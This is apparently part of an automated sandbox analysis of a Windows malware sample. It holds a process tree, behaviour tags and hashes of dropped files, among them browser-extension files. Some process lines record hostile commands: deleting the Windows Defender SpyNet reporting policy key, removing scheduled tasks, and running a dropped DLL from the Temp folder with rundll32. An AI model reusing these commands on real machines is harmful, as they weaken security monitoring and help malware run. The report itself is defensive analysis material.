C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4992
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"2⤵PID:2752
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 3851181⤵PID:4124
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"3⤵PID:1644
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5eff67de9923d03a3f91f6aa2ce002ad6
SHA1481555697db8204d7a7dd94db24ba3a986680864
SHA25675748acf565608cf6f935f220ba4ac7e5ae2b5d6dd7724b1ec625950aab9a2c2
SHA512ce90902beef31d1341535429af51444366577fb4df5fa4c95a2c096f15f18347a0adf7bcc8c38c0f787a257b61c75b8441812ed396154ac57c774b7945f80f09
-
Filesize
2KB
MD5315eb76dd743d4dd464f26537d2ef3e7
SHA1eb09261f83548e89fccbde349751a99cdc6c77a9
SHA2562c90f8f7017d0e83c29783c781f105386ca9d0df18a4c141c6d8ec0d359b651f
SHA5122c7bf3422a23b09e550afd49d09f7156a9747fbf6ca0c9a2da04342d48a271b278e3ead06236048e4878f6669489b00547855e6acf89d703391092869fc6ab38
-
Filesize
2KB
MD561a55f05dead9e59252bffad748dca04
SHA15cc5628dc813077d3ad54c48a00decf9d0db2104
SHA256ab7bac0687a00f1fd10e4e337900ae8dc1c7a72ca811620a2b03b1777f09eec5
SHA512d9645454103f0b70537967054112f34026e686b81ed12bf8f478ef0e4412d2219d5cf33685648a35e0286d80592954a368d9f7b93d443f4a2e1083ab32b0d5a5
-
Filesize
2KB
MD5b1269552401158d0e5ee8903ed13a45d
SHA1dbbb3ed2bc36a11c251e09bdc83787f8a767aa2b
SHA256779e9e765d439b302184fb08e465aa880da8000d469307c65ec39d32c1642352
SHA512768725b595b631f1674dcc8fcbcc876e101ced0c82658a817a3518a1d0e95a6005cbc6bf7d8bd2b5c7d5d0f374c6248fdea4e298ee3bd0efc1a9e1b014d2d9a2
-
Filesize
2.0MB
MD54b3b0c0c9e24f6362fa797ae5deb3bce
SHA195c101e95e4eeaf213d87c2c8cd657ccd5dd78b9
SHA2562fb67cc3c92e505a942607a1a0499b53c1f3d2d79ae15b946deec5166ddce62d
SHA512f3ba26fc33d17952d32772ba542128fb726c34b241079101a09d18da91f08ea8486027ccd67a88f3c06add8000a93b0a7e3dc975a103632039521287216c779c
-
Filesize
2KB
MD5edcac4e3e3a9b66ab8aac5cdfcee2b16
SHA164ccaadd705bdcefe3a7f4adf268433143639256
SHA256ab50d17f4cf46682a6e828d8e3d0d0fdbabd776c26043d4d3528b51de9718fe1
SHA5120f787366d74fc5f4a520b4ac2695c3ba1a89eb4dc70daf68894ddaa081f556fda8b261bfb9a8fd7d736058afbbe648de912acf4f2c845248e578a76ecd78f7db
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD58c70623a41f13f4b3f5ff4b935f637fe
SHA1c6d94c98bb31a26dfc5f3ec6aa6adf7367603fa8
SHA2563dfa2e4ca61f08ec3b936a0885637bec8ca34ea6ba913ef0ca686c900c8e46d6
SHA512fe7b716776e98882749e2d59733d029addef041da8095f6ff458af9d6d962139ac4329af1dcae69197a4d2492aed128b4c98978ada5b80bf5cbd2d805466c84c
-
Filesize
34KB
MD5b750517d9a8a819c31e5fae1497be7f5
SHA1a6943ce44dadf7cc84f7982ebe0b320b8b39e3ca
SHA2568f1ac4af8bea6c885ea471794a7ff15c22337002de0c771cb46a01cdb4900394
SHA51238a1a5479420ca4c76dd5e515f166d4a97c271b57977ded7d1fa1a3d4a58528a1ea4c8dea45b2d19b766fc72694f0eb5fada362f106ee984a4b7bc24ff0f0c36
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
15KB
MD5d4f2005deb3396f5e0fadef016bdf38f
SHA1fa9d7a186313aaa52f81301972789f4f977aa70d
SHA25692a36ad675bf3d09851e35792033d08c5aaac355bf47b7d61a4bf13e448120b8
SHA512ccf0ac4b2b53b75af699fd6c67fdc698f0bb58b158f20b2d35154bf664ca8c1b7f2fc12c385fdd486faa8ab09bd898c176a0ef141037aacb3ff28213a09d07f4
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.9MB
MD5ea99e72c1ac89aa9cc14178b1c46d50d
SHA160b896781f40e89106d0c76abd11c5b5d0832943
SHA2569cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA51203693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5d9a698298df9396c239d3af6d9f0d12c
SHA172e67e26785adecfd4d49bad40a5f47b0ba13a46
SHA25633a5c704ffbe3308bfb04688e95ee971560b62f2944cbf1717ce09b952e0db25
SHA512c67d57646e629de25a24876b24f842ccb4e548349f5e67a8a23822a30c3caf6e9f0304f1d72f51e67b2725a85d70930f4f2113e302c93257769f62ab01c2debb
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5695285b42a109bf59d3e0fdc130fe35e
SHA19a665a148d5b3b89e2c28f8924abd0fe253d5b4d
SHA2566747d6f7397b098cc9790d4adfc2b6ae1322f2ea991652d1de230584b4f2a5ed
SHA512bffb5d8a9f5b0a43cff680b3b18de77a495fcf9f9196917b11dd3954ae9378c723eaf30ad13004e4f74af532d47480740e3a083006e87fe77ca154bc0c595479
-
Filesize
6.3MB
MD5fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA2567c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA51205d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a
-
Filesize
6KB
MD5af5a6b277700c3d5f2b18476dc79bf88
SHA1cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA2563bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA51227649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732